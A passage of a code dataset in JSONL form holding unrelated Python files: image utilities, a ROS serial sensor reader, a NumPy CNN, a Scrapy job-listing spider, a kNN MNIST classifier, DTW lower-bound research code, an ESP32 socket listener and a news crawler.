settings\ntry:\n import Image as Pil\n import ImageOps\nexcept ImportError:\n import PIL as Pil\n from PIL import ImageOps\n \n\ndef get_rgb_image(instance):\n img = Pil.open(instance.src.path)\n img.draft(\"RGB\", img.size)\n img = img.convert(\"RGB\")\n return img\n\ndef width_height(instance, path, width, height):\n img = get_rgb_image(instance)\n w, h = img.size\n if w > width:\n return rescale(instance, path, width, height)\n img.save( path, 'JPEG' , quality=90)\n\n\ndef ignore(instance, path, *args, **kwargs):\n img = get_rgb_image(instance)\n img.save( path, 'JPEG' , quality=90)\n\ndef crop(instance, path, width, height):\n img = get_rgb_image(instance)\n # a nice convenient function\n img = ImageOps.fit(img, size=(width,height), centering=(0.5,0.5), method=Pil.ANTIALIAS)\n img.save( path, 'JPEG' , quality=90)\n\ndef rescale(instance, path, width, height):\n img = get_rgb_image(instance)\n w, h = img.size\n if w > h:\n scale = width / w\n height = int(scale * h)\n else:\n scale = height / h\n width = int(scale * w)\n img = img.resize((width, height), Pil.ANTIALIAS)\n img.save( path, 'JPEG' , quality=90)\n \n","sub_path":"cc/lib/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"594075993","text":"#!/usr/bin/env python \n\n# TESTED RUN\n# python3 /home/crslab/catkin_ws/src/real_time_plot/scripts/aces_connect.py /dev/ttyUSB1\n\nimport serial\nimport numpy as np\nimport time\nimport scipy.io as sio\nimport rospy\nfrom std_msgs.msg import String\nimport sys\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\nclass AcesReader():\n def __init__(self, argv):\n\n self.b_order = sys.byteorder\n self.ser = serial.Serial(port = argv[1],baudrate=115200,bytesize=8,timeout=0.01,stopbits=serial.STOPBITS_ONE)\n print('Connected to: '+self.ser.portstr)\n self.plotting = False\n self.fn_sub = rospy.Subscriber(\"filename\", String, self.callback)\n self.pub = rospy.Publisher('aces_real_time', String, queue_size=10)\n self.t_window = time.time()\n # init plot stuff\n self.plot_tools_init()\n #self.update_plot()\n\n def load_FRANKA_fingers(self, left_finger_path, right_finger_path):\n LEFT= np.asarray(sio.loadmat(left_finger_path)['ACES_ROBOTIQ_LEFT_LUT'])\n RIGHT = np.asarray(sio.loadmat(right_finger_path)['ACES_ROBOTIQ_RIGHT_LUT'])\n return LEFT, RIGHT\n\n\n def plot_tools_init(self):\n self.LEFT_FINGER_MAP, self.RIGHT_FINGER_MAP = self.load_FRANKA_fingers('/home/crslab/panda_sim/aces_finger_not_catkin_pkg/ACES_ROBOTIQ_LEFT_LUT.mat','/home/crslab/panda_sim/aces_finger_not_catkin_pkg/ACES_ROBOTIQ_RIGHT_LUT.mat')\n self.stacked_finger_map = np.vstack((self.LEFT_FINGER_MAP,self.RIGHT_FINGER_MAP))\n self.stacked_finger_map = np.squeeze(self.stacked_finger_map, axis=1)\n self.recorded_nodes = list()\n self.base_LUT_2 = np.asarray(sio.loadmat('/home/crslab/aces_finger_not_catkin_pkg/ROBOTIQ_BASE_LUT_rev2.mat')['L2'])\n\n\n\n\n def produce_plots(self):\n ######\n #print('Right finger:', len(self.recorded_nodes))\n nodes_2, count_nodes_2 = np.unique(self.recorded_nodes,return_counts=True)\n\n #left_C_2 = np.zeros((39,1))\n right_C_2 = np.zeros((39,1))\n #print(len(nodes_2))\n\n # can be optimized further only for one finger\n for n in range(len(nodes_2)):\n # if nodes_2[n] in self.LEFT_FINGER_MAP:\n # ind = np.where(self.LEFT_FINGER_MAP==nodes_2[n])\n # left_C_2[ind] = count_nodes_2[n]\n if nodes_2[n] in self.RIGHT_FINGER_MAP:\n ind = np.where(self.RIGHT_FINGER_MAP==nodes_2[n])\n right_C_2[ind] = count_nodes_2[n]\n\n\n str_right_C_2 = ''\n for a in right_C_2:\n str_right_C_2 += str(a[0]) + ','\n\n self.pub.publish(str_right_C_2)\n\n\n\n self.recorded_nodes = list()\n\n def callback(self, data):\n if self.plotting and data.data == 'stop':\n print(\"Stop recording\")\n self.plotting=False\n else:\n print('Start plotting')\n self.plotting=True\n\n def bytereader(self, byteobject):\n x = bin(int.from_bytes(byteobject,byteorder=self.b_order)) #python3\n #print('x', x)\n if len(x) == 10: # negative to have up to 10 values\n x = x[0:2]+x[3:]\n x = 80 - int(x,2)\n isneg = 1\n elif len(x) == 3 and x[-1]=='0': # For no value zeros\n x = x[:]\n x = int(x,2)\n isneg = 0\n else:\n x = x[0:2]+'0'*(10-len(x))+x[2:]\n x = 80 - int(x,2)\n isneg = 0\n return np.int8(x), isneg\n\n def update_plot(self):\n self.produce_plots()\n \nrospy.init_node('real_time_plotting', anonymous=True)\naces = AcesReader(sys.argv)\n\n\n\nwhile True:\n\n # read aces\n b = aces.ser.read()\n #print(len(a))\\\n #print(str(b))\n\n add = False\n if rospy.is_shutdown():\n break\n\n if len(b) > 0:\n val, polarity = aces.bytereader(b)\n add = True\n\n # plot within specified time\n if time.time() - aces.t_window >= 0.05:\n #print(time.time() - aces.t_window)\n aces.t_window = time.time()# + 0.25\n #print('here')\n #print(add)\n #print(len(aces.recorded_nodes))\n aces.update_plot()\n else:\n if add:\n #print('here2', count)\n aces.recorded_nodes.append(val)\n\naces.ser.close() # <- PLEASE RUN THIS AFTER YOU CTRL-C OR STOP. IF NOT YOU NEED TO RESTART YOUR CONSOLE.","sub_path":"scripts/aces_connect.py","file_name":"aces_connect.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546985631","text":"import pathlib\nfrom setuptools import find_packages, setup\n\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / 'README.md').read_text()\n\nsetup(\n name=\"adou\",\n version=\"0.0.0\",\n description=\"Just some typical approaches for document understanding and related tasks.\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/dpsnewailab/adou\",\n author=\"DPS-AI Lab\",\n author_email=\"aiteam@dps.com.vn\",\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n ],\n packages=find_packages(exclude=('example', 'test')),\n include_package_data=True,\n install_requires=['torch==1.4.0',\n 'torchvision==0.5.0',\n 'tqdm==4.32.2'],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38005698","text":"# coding: utf-8\n\"\"\"\nconvolutional neural network\n\"\"\"\nimport numpy as np\n\nfrom .layers import *\nfrom .layer_utils import *\n\n\nclass ThreeLayerConvNet(object):\n \"\"\"\n A three-layer convolutional network with the following architecture:\n\n conv - relu - 2x2 max pool - affine - relu - affine - softmax\n\n The network operates on minibatches of data that have shape (N, C, H, W)\n consisting of N images, each with height H and width W and with C input\n channels.\n \"\"\"\n\n def __init__(self, input_dim=(3, 32, 32), num_filters=32, filter_size=7,\n hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0,\n dtype=np.float32):\n \"\"\"\n Initialize a new network.\n\n arch: conv -> relu -> max_pooling -> fc -> relu -> fc\n\n Inputs:\n - input_dim: Tuple (C, H, W) giving size of input data\n - num_filters: Number of filters to use in the convolutional layer\n - filter_size: Size of filters to use in the convolutional layer\n - hidden_dim: Number of units to use in the fully-connected hidden layer\n - num_classes: Number of scores to produce from the final affine layer.\n - weight_scale: Scalar giving standard deviation for random initialization\n of weights.\n - reg: Scalar giving L2 regularization strength\n - dtype: numpy datatype to use for computation.\n \"\"\"\n self.params = {}\n self.reg = reg\n self.dtype = dtype\n\n self.params['W1'] = np.random.randn(num_filters, input_dim[0], filter_size, filter_size) * weight_scale\n self.params['b1'] = np.zeros(num_filters)\n\n self.params['W2'] = np.random.randn(int(input_dim[1]*input_dim[2]/4*num_filters), hidden_dim) * weight_scale\n self.params['b2'] = np.zeros(hidden_dim)\n\n self.params['W3'] = np.random.randn(hidden_dim, num_classes)\n self.params['b3'] = np.zeros(num_classes)\n\n for k, v in self.params.items():\n self.params[k] = v.astype(dtype)\n\n def loss(self, X, y=None):\n W1, b1 = self.params['W1'], self.params['b1']\n W2, b2 = self.params['W2'], self.params['b2']\n W3, b3 = self.params['W3'], self.params['b3']\n\n filter_size = W1.shape[2]\n conv_param = {'stride': 1, 'pad': (filter_size - 1) // 2}\n pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2}\n\n conv_out, conv_cache = conv_relu_forward(X, W1, b1, conv_param)\n max_pool_out, max_pool_cache = max_pool_forward_naive(conv_out, pool_param)\n aff1_out, aff1_cache = affine_relu_forward(max_pool_out, W2, b2)\n scores, aff2_cache = affine_forward(aff1_out, W3, b3)\n\n if y is None:\n return scores\n\n loss, grads = 0, {}\n loss, dx = softmax_loss(scores, y)\n dx, dW3, db3 = affine_backward(dx, aff2_cache)\n dx, dW2, db2 = affine_relu_backward(dx, aff1_cache)\n dx = max_pool_backward_naive(dx, max_pool_cache)\n dx, dW1, db1 = conv_relu_backward(dx, conv_cache)\n\n grads['W1'] = dW1\n grads['b1'] = db1\n grads['W2'] = dW2\n grads['b2'] = db2\n grads['W3'] = dW3\n grads['b3'] = db3\n\n return loss, grads\n","sub_path":"ml/nn/saiph/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"146947768","text":"import heapq\nclass Solution(object):\n def leastInterval(self, tasks, n):\n t = 0\n hashmap = {}\n for task in tasks:\n hashmap[task] = hashmap.get(task, 0)+1\n min_heap = []\n for key, value in hashmap.items():\n min_heap.append([0, key, value])\n while min_heap:\n heapq.heapify(min_heap)\n time, task, count = heapq.heappop(min_heap)\n t += time+1\n for i in range(len(min_heap)):\n min_heap[i][0] = 0 if min_heap[i][0] <= time+1 else min_heap[i][0] - time -1\n count -= 1\n if count > 0:\n heapq.heappush(min_heap, [n, task, count])\n return t\n'''\n这题我不会做, 原来是用贪心\n'''\na = Solution()\ntasks = [\"A\",\"A\",\"A\",\"B\",\"B\",\"B\"]\nn = 2\nprint(a.leastInterval(tasks, n))","sub_path":"All_about_sorted/CountingSort/Greedy_stunk/Leetcode_621/lc621.py","file_name":"lc621.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"264260019","text":"# -*- coding: utf-8 -*-\nfrom scrapy import Spider,FormRequest\nimport json\nfrom Collector.items import JobItem\n\nclass LagouSpider(Spider):\n name=\"lagou\"\n pn=1\n allowed_domains=[\"lagou.com\"]\n start_urls=[\n 'http://www.lagou.com/jobs/positionAjax.json?px=new',\n ]\n\n def parse(self,response):\n\n content=json.loads(response.text).get('content',{}).get('positionResult',{}).get('result',[])\n if(content):\n item=JobItem()\n self.pn+=1\n for _ in content:\n item['leaderName']=_.get('leaderName','None')\n item['companySize']=_.get('companySize','None')\n item['workYear']=_.get('workYear','None')\n item['education']=_.get('education','None')\n item['financeStage']=_.get('financeStage','None')\n item['pvScore']=_.get('pvScore','None')\n item['city']=_.get('city','None')\n item['companyLogo']=_.get('companyLogo','None')\n item['companyId']=_.get('companyId','None')\n item['industryField']=_.get('industryField','None')\n item['companyLabelList']=_.get('companyLabelList','None')\n item['formatCreateTime']=_.get('formatCreateTime','None')\n item['salary']=_.get('salary','None')\n item['positionName']=_.get('positionName','None')\n item['companyName']=_.get('companyName','None')\n item['jobNature']=_.get('jobNature','None')\n item['positionFirstType']=_.get('positionFirstType','None')\n item['createTime']=_.get('createTime','None')\n item['positionId']=_.get('positionId','None')\n item['companyShortName']=_.get('companyShortName','None')\n item['positionType']=_.get('positionType','None')\n item['positionAdvantage']=_.get('positionAdvantage','None')\n yield item\n \n data={\n 'first':'false',\n 'pn':str(self.pn),\n 'kd':'', \n }\n yield FormRequest(self.start_urls[0],formdata=data) #默认调用parse,这里不能使用Request\n","sub_path":"Collector/spiders/lagou.py","file_name":"lagou.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"162315616","text":"import numpy as np\nimport tensorflow as tf\n\n# Import MNIST Data\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# Store the MNIST data into the tmp data\nmnist = input_data.read_data_sets(\"mnist_data/\", one_hot=True)\n\n# Using the subset of the data for ensuring that we can run faster. \ntraining_digits, training_labels = mnist.train.next_batch(5000)\ntest_digits, test_labels = mnist.test.next_batch(200)\n\ntraining_digits_pl = tf.placeholder(\"float\", [None, 784])\ntest_digits_pl = tf.placeholder(\"float\", [784])\n\n# Nearest neighbout calculation using the L1 distance\nl1_distance = tf.abs(tf.add(training_digits_pl, tf.negative(test_digits_pl)))\n\ndistance = tf.reduce_sum(l1_distance, axis=1)\n\n# Prediction - Get min distance index ()\npred = tf.arg_min(distance, 0)\n\naccuracy = 0\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n for i in range(len(test_digits)):\n # Get NN neightbour\n nn_index = sess.run(pred, \\\n feed_dict={training_digits_pl:training_digits, test_digits_pl:test_digits[i,:]})\n\n print(\"Test \", i, \"Prediction \", np.argmax(training_labels[nn_index]), \"True Label \", np.argmax(test_labels[i]))\n\n # Calculate the accuracy\n if np.argmax(training_labels[nn_index]) == np.argmax(test_labels[i]):\n accuracy += 1./len(test_digits)\n\n\nprint(\"Done !\")\nprint(\"Accuracy : \", accuracy)","sub_path":"TF_Regression_KNN/m5_knn_mnist.py","file_name":"m5_knn_mnist.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428350588","text":"from Methods.Util import *\n\n# This file implements quantization-based clustering for LB_MV.\n# It is the offline candidate clustering version, with adaptive cluster numbers.\n# It does not use X0 at all.\n\n# The dataCollection function saves the following:\n# the lower bounds in each individual directory: an nd array\n# the DTW distances and skips and coreTime in each individual directory: a text file\n# the setup time and total lower bound time of each dataset in one overall file in AllDataSets directory: an nd array\n\n\ndef getLBs (dataset, query, reference, w, dim, K=4, Q=2):\n nqueries = len(query)\n length=len(query[0])\n nrefs=len(reference)\n windowSize = w if w <= length / 2 else int(length / 2)\n print(\"W=\" + str(windowSize) + '\\n')\n\n # Calculate slices range\n print(\"Bounding boxes finding Start!\")\n start=time.time()\n bboxes = [findBoundingBoxes(np.array(ref), K, windowSize, Q) for ref in reference]\n end=time.time()\n nboxes=0\n for r in range(len(reference)):\n boxes = bboxes[r]\n nboxes += sum([len(p) for p in boxes])\n setuptime2003cluster_q=end-start\n print(\"Bounding boxes Done!\")\n\n # Calculate Lower Bounds\n print(\"Cluster-2003-quick lower bounds. Start!\")\n start=time.time()\n lbs_2003_cluster_q = [getLB_oneQ (query[ids1], reference, dim, bboxes) for ids1 in range(len(query))]\n end=time.time()\n lbtime2003cluster_q=end-start\n # np.save(pathUCRResult+ dataset + \"/\" + str(w) + \"/\" + str(nqueries_g) + \"X\" +\n # str(nreferences_g) + \"_X3_\"+ \"K\"+ intlist2str(K) +\"Q\" + intlist2str(Q) + \"_lbs.npy\", lbs_2003_cluster_q)\n print(\"Cluster-2003-quick Done!\" + '\\n')\n\n# thistimes = [setuptime2003cluster_q, lbtime2003cluster_q]\n\n# np.save(pathUCRResult+ dataset + \"/\" + str(w) + \"/\" + str(nqueries_g) + \"X\" +\n# str(nreferences_g) + \"_X3_\"+ \"K\"+ intlist2str(K) +\"Q\" + intlist2str(Q) + \"_times.npy\", thistimes)\n\n# allTimes_g.append([setuptime2003cluster_q, lbtime2003cluster_q])\n\n return lbs_2003_cluster_q, [setuptime2003cluster_q, lbtime2003cluster_q], nboxes\n\ndef findBoundingBoxes (ref, K, W, Q):\n '''\n find the K bounding boxes for each window in ref with quantizations\n :param ref: a data frame holding a reference series\n :param K: the number of bounding boxes\n :param W: the window size\n :param Q: the number of cells in each dimension\n :return: a len(ref)*K array with each element [ [dim low ends] [dim high ends]]\n '''\n length = ref.shape[0]\n dims = ref.shape[1]\n allBoxes = []\n for idx in range(length):\n# nonEmptyCells = {}\n cellMembers = {}\n bboxes = []\n awindow = ref[(idx - W if idx - W >= 0 else 0):(idx + W if idx + W <= length else length)]\n overall_ls = [min(np.array(awindow)[:,idd]) for idd in range(dims)]\n overall_us = [max(np.array(awindow)[:, idd]) for idd in range(dims)]\n cells = [1+int((overall_us[idd] - overall_ls[idd])*Q) for idd in range(dims)]\n celllens = [ (overall_us[idd] - overall_ls[idd])/cells[idd]+0.00000001 for idd in range(dims) ]\n for e in awindow:\n thiscell = str([int( (e[idd]-overall_ls[idd])/celllens[idd]) for idd in range(dims)])\n if thiscell in cellMembers:\n cellMembers[thiscell].append(e)\n else:\n cellMembers[thiscell] = [e]\n# if len(cellMembers.keys())>K:\n# bboxes=[[overall_ls, overall_us]]\n# else:\n for g in cellMembers:\n l = [min(np.array(cellMembers[g])[:, idd]) for idd in range(dims)]\n u = [max(np.array(cellMembers[g])[:, idd]) for idd in range(dims)]\n bboxes.append([l, u])\n if len(bboxes)>K:\n # combine all boxes except the first K-1 boxes\n sublist = bboxes[K-1:]\n combinedL = [min([ b[0][idd] for b in sublist]) for idd in range(dims)]\n combinedU = [max([b[1][idd] for b in sublist]) for idd in range(dims)]\n bboxes= bboxes[0:K-1]\n bboxes.append([combinedL, combinedU])\n allBoxes.append(bboxes)\n return np.array(allBoxes)\n\n\ndef getLB_oneQ (X, others, dim, sl_bounds):\n # X is one series, others is all references, dim is dimensions, sl_bounds has all the bounding boxes of all reference series\n lbs = []\n for idy, s2 in enumerate(others):\n temps = []\n LB_sum = 0\n slboundsOneY = sl_bounds[idy]\n for idx, x in enumerate(X):\n numBoxes = len(slboundsOneY[idx])\n oneYbounds=[]\n for idbox in range(numBoxes):\n l = slboundsOneY[idx][idbox][0]\n u = slboundsOneY[idx][idbox][1]\n temp = math.sqrt(sum([(x[idd]-u[idd]) ** 2 if (x[idd] > u[idd]) else (l[idd]-x[idd])**2 if (x[idd] < l[idd]) else 0\n for idd in range(dim)]))\n oneYbounds.append(temp)\n LB_sum+=min(oneYbounds)\n lbs.append(LB_sum)\n return lbs\n\ndef dataCollection(pathUCRResult, datasetsNameFile, datasetsSizeFile, datapath, maxdim = 5, nqueries = 3, nreferences = 20, windows = [20], Ks=[6], Qs=[2]):\n datasets = []\n # with open(\"Results/UCR/allDataSetsNames.txt\",'r') as f:\n with open(datasetsNameFile, 'r') as f:\n for line in f:\n datasets.append(line.strip())\n f.close()\n datasize = []\n # with open(\"Results/UCR/size.txt\",'r') as f:\n with open(datasetsSizeFile, 'r') as f:\n for line in f:\n datasize.append(int(line.strip()))\n f.close()\n\n# datasets=[\"ArticularyWordRecognition\",\"AtrialFibrillation\"]\n\n # # create directories if necessary\n # for datasetName in datasets:\n # for w in windows:\n # dir = pathUCRResult+\"\" + datasetName + \"/\" + str(w)\n # if not os.path.exists(dir):\n # os.makedirs(dir)\n\n #times = np.load(pathUCRResult+\"\" + '/' + str(nqueries) + \"X\" + str(nreferences) + \"_times_2003_cluster.npy\")\n\n # get # of skips quickly\n # for datasetName in datasets:\n # for w in windows:\n # lb_quant, lb_2003 = load_saved_lb(datasetName, w)\n # get_skips_quick(datasetName, w, lb_quant, lb_2003, 3)\n # print(\"get_skips_quick is done.\")\n\n ################\n allTimes = []\n allnboxes = []\n for idxset, dataset in enumerate(datasets):\n print(dataset+\" Start!\")\n assert(datasize[idxset]>=nqueries+nreferences)\n stuff = loadUCRData_norm_xs(datapath, dataset,nqueries+nreferences)\n size = len(stuff)\n length = stuff[0].shape[0]\n dim = min(stuff[0].shape[1], maxdim)\n print(\"Size: \"+str(size))\n print(\"Dim: \"+str(dim))\n print(\"Length: \"+str(length))\n samplequery = stuff[:nqueries]\n samplereference = stuff[nqueries:nreferences+nqueries]\n # -------------------------------------------------\n if (nqueries * nreferences == 0): # all series to be used\n qfrac = 0.3\n samplequery = stuff[:int(size * qfrac)]\n samplereference = stuff[int(size * qfrac):]\n # -------------------------------------------------\n\n print(dataset+\": \"+ str(nqueries)+\" queries, \"+ str(nreferences)+ \" references.\" +\n \" Total dtw: \"+str(nqueries*nreferences))\n\n query = [q.values[:, :dim] for q in samplequery]\n reference = [r.values[:, :dim] for r in samplereference]\n\n for w in windows:\n for K in Ks:\n for Q in Qs:\n print(\"K=\"+str(K)+\" Q=\"+str(Q))\n lbs_X3, times, nboxes = getLBs (dataset, query, reference, w, dim, K, Q)\n allnboxes.append(nboxes)\n np.save(pathUCRResult + dataset + '/d' + str(maxdim) + '/w' + str(w) + \"/\"\n + str(nqueries) + \"X\" + str(nreferences) + \"_X3_K\" + str(K) + \"Q\" + str(Q) + \"_lbs.npy\", lbs_X3)\n allTimes.append(times)\n results = get_skips(dataset, maxdim, w, lbs_X3, query, reference, pathUCRResult, nqueries,nreferences)\n if findErrors(dataset, maxdim, w, nqueries, nreferences, results, pathUCRResult):\n print('Wrong Results!! Dataset: ' + dataset)\n exit()\n with open(pathUCRResult + dataset + '/' + 'd' + str(maxdim) + '/w' + str(w) + \"/\" + str(\n nqueries) + \"X\" + str(\n nreferences) + \"_\" + \"X3_K\" + str(K) + \"Q\" + str(Q) + \"_results\" + \".txt\", 'w') as f:\n for r in results:\n f.write(str(r) + '\\n')\n print(dataset+\" Done!\"+'\\n'+'\\n')\n\n np.save(pathUCRResult+\"\" + '/_AllDataSets/' + \"/d\"+ str(maxdim) + \"/\" + str(nqueries)+\"X\"+str(nreferences)\n + \"_X3_\"+\"w\" + intlist2str(windows)+ \"K\"+intlist2str(Ks)+\"Q\"+intlist2str(Qs) + \"_times.npy\", np.array(allTimes))\n np.save(pathUCRResult+\"\" + '/_AllDataSets/' + \"/d\"+ str(maxdim) + \"/\" + str(nqueries)+\"X\"+str(nreferences)\n + \"_X3_\"+\"w\" + intlist2str(windows)+ \"K\"+intlist2str(Ks)+\"Q\"+intlist2str(Qs) + \"_nboxes.npy\", np.array(allnboxes))\n\n print(\"Data collection is done.\")\n\ndef dataProcessing(datasetsNameFile, pathUCRResult=\"../Results/UCR/\", maxdim = 5, nqueries = 3, nreferences = 20, windows = [20], Ks=[6], Qs=[2],machineRatios=[1,1]):\n datasets = []\n # with open(pathUCRResult+\"allDataSetsNames.txt\",'r') as f:\n with open(datasetsNameFile, 'r') as f:\n for line in f:\n datasets.append(line.strip())\n f.close()\n window = windows[0]\n rdtw = machineRatios[0]\n rother = machineRatios[1]\n t1dtw = loadt1dtw(pathUCRResult, maxdim, window)\n\n# datasets = [\"ArticularyWordRecognition\", \"AtrialFibrillation\"]\n\n ndatasets = len(datasets)\n\n # compute speedups\n x3setupLBtimes = np.load(\n pathUCRResult + '_AllDataSets/' + 'd' + str(maxdim) + \"/\" + str(nqueries) + \"X\" + str(nreferences)\n + \"_X3_w\" + intlist2str(windows) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs)+\"_times.npy\")\n x3tLB = x3setupLBtimes[:,1]\n tCore = []\n skips = []\n ## -------------------\n NPairs = []\n if nqueries * nreferences == 0:\n actualNQNRs = np.loadtxt(pathUCRResult + '/usabledatasets_nq_nref.txt').reshape((-1, 2))\n for i in range(len(datasets)):\n actualNQ = actualNQNRs[i][0]\n actualNR = actualNQNRs[i][1]\n NPairs.append(actualNQ * actualNR)\n ## -------------------\n for dataset in datasets:\n for K in Ks:\n for Q in Qs:\n results = readResultFile(\n pathUCRResult + dataset + '/d' + str(maxdim) + \"/w\" + str(windows[0]) + \"/\" + str(nqueries) + \"X\" + str(\n nreferences) + \"_X3_K\" + str(K) + \"Q\"+str(Q)+\"_results.txt\")\n tCore.append(sum(results[:, 3]))\n skips.append(sum(results[:, 2]))\n tCore = np.array(tCore).reshape((ndatasets, -1))\n skips = np.array(skips).reshape((ndatasets, -1))\n\n tCorePlus = tCore + x3tLB.reshape((ndatasets,-1))\n tDTW = np.tile(t1dtw[0:ndatasets], (skips.shape[1], 1)).transpose() * ((skips - NPairs) * -1)\n tsum = rother * tCorePlus + rdtw * tDTW\n tsum_min = np.min(tsum, axis=1)\n setting_chosen = np.argmin(tsum,axis=1)\n skips_chosen = np.array( [skips[i,setting_chosen[i]] for i in range(skips.shape[0])] )\n overhead = rother* np.array([tCorePlus[i,setting_chosen[i]] for i in range(tCorePlus.shape[0])])\n speedups = (rdtw * t1dtw[0:ndatasets] * NPairs) / tsum_min\n overheadrate = overhead/(rdtw * t1dtw[0:ndatasets] * NPairs)\n\n np.save(pathUCRResult + \"_AllDataSets/\" + 'd' + str(maxdim) + '/' + str(nqueries) + \"X\" + str(nreferences) +\n \"_X3_w\" + str(window) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs) + '_speedups.npy', speedups)\n np.save(pathUCRResult + \"_AllDataSets/\" + 'd' + str(maxdim) + '/' + str(nqueries) + \"X\" + str(nreferences) +\n \"_X3_w\" + str(window) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs) + '_skipschosen.npy', skips_chosen)\n np.save(pathUCRResult + \"_AllDataSets/\" + 'd' + str(maxdim) + '/' + str(nqueries) + \"X\" + str(nreferences) +\n \"_X3_w\" + str(window) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs) + '_settingchosen.npy', setting_chosen)\n np.save(pathUCRResult + \"_AllDataSets/\" + 'd' + str(maxdim) + '/' + str(nqueries) + \"X\" + str(nreferences) +\n \"_X3_w\" + str(window) + \"K\" + intlist2str(Ks) + \"Q\" + intlist2str(Qs) + '_overheadrate.npy', overheadrate)\n\n return 0\n\n\n###############\nif __name__ == \"__main__\":\n datapath= \"/Users/xshen/Kids/DanielShen/Research/DTW/Triangle/workshop/TriangleDTW/Data/Multivariate_pickled/\"\n pathUCRResult = \"../Results/UCR/\"\n datasetsNameFile = pathUCRResult+\"allDataSetsNames_no_EigenWorms.txt\"\n datasetsSizeFile = pathUCRResult+\"size_no_EigenWorms.txt\"\n\n maxdim_g = 5\n nqueries_g = 3\n nreferences_g = 20\n Ks_g = [4, 6, 8]\n Qs_g = [2, 3, 4]\n windows_g = [20]\n dataCollection(pathUCRResult, datasetsNameFile, datasetsSizeFile, datapath, maxdim_g,nqueries_g,nreferences_g,windows_g,Ks_g,Qs_g)\n dataProcessing(datasetsNameFile, pathUCRResult, maxdim_g,nqueries_g,nreferences_g,windows_g,Ks_g,Qs_g)\n\n print(\"End\")","sub_path":"Methods/X3.py","file_name":"X3.py","file_ext":"py","file_size_in_byte":13271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524844113","text":"import usocket as socket\r\nimport utime as time\r\nfrom machine import Pin, PWM\r\nimport sys\r\n\r\n\r\nessid = 'SSID'\r\nessid_password = 'PASSWORD'\r\n\r\n\r\nfrom nettools import wlan_connect,wlan_disconnect\r\n\r\ntry:\r\n wlan_connect(essid,essid_password,timeout=15)\r\nexcept:\r\n print('Failed to connect to WiFi')\r\n\r\nHOST = '0.0.0.0' \r\nPORT = 18000 \r\ntime.sleep(2)\r\n\r\n\r\n\r\ndef DataReceive(conn):\r\n \r\n while True:\r\n data = conn.recv(1024)\r\n if not data:\r\n return None\r\n return data\r\n\r\n\r\ndef DataAnalyzer(data):\r\n if data.decode() == \"commande\":\r\n try:\r\n ActionManager()\r\n except:\r\n return False\r\n return 'Done'\r\n\r\n\r\ndef ActionManager():\r\n #Cleaning process\r\n cycle = 0\r\n max = 0 #A remplacer par la longueur du bras le long de la table\r\n for cycle in range(0, max):\r\n PWM(Pin(15)).duty(cycle)\r\n return None\r\n\r\n\r\n \r\ndef main():\r\n while True:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\r\n s.bind((HOST, PORT))\r\n s.listen(1)\r\n print(\"Waiting for connexion\")\r\n conn, addr = s.accept()\r\n print('Connected by', addr)\r\n\r\n data = DataReceive(conn)\r\n if DataAnalyzer(data) == False:\r\n print(\"An error occured\")\r\n break\r\n conn.sendall(b'Done')\r\n s.close()\r\n\r\n \r\ndef alert():\r\n sys.exit()\r\n\r\nmain()","sub_path":"ESP32/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64026035","text":"import requests\nimport yaml\nfrom field_page import Field\nfrom bs4 import BeautifulSoup\nimport os\nimport csv\n\n'''\n Crawl each field url from main page.\n Create Field object for each field exist in requested fields in parameters.\n'''\n\n\nclass Main:\n def __init__(self, parameters=None):\n self.baseURL = None\n self.fields_name = None\n self.fields = []\n self.load_variables(parameters)\n self.crawl_fields()\n\n def load_variables(self, parameters):\n if parameters is None:\n with open('../config') as conf_file:\n configs = yaml.full_load(conf_file)['Crawl']\n self.fields_name = configs['FIELDS']\n self.baseURL = configs['BASEURL']\n self.max_page = configs['MAXPAGE']\n else:\n self.fields_name = parameters.fields\n self.baseURL = parameters.baseURL\n\n def crawl_fields(self):\n fields = {}\n article = requests.get(self.baseURL + '/persian')\n soup = BeautifulSoup(article.content, 'html.parser')\n type_list = soup.find(role='navigation')\n type_list = type_list.find_all('ul')[0]\n for a in type_list.find_all('a'):\n url = a.get('href')\n text = a.get_text()\n if text in self.fields_name:\n max_page = self.max_page[self.fields_name.index(text)]\n self.fields.append(Field(text, url, self.baseURL, max_page))\n\nif not os.path.exists('../data/dataset.csv'):\n with open('../data/dataset.csv', 'w', newline='') as csvfile:\n fieldnames = ['url', 'title', 'headline', 'body']\n writer = 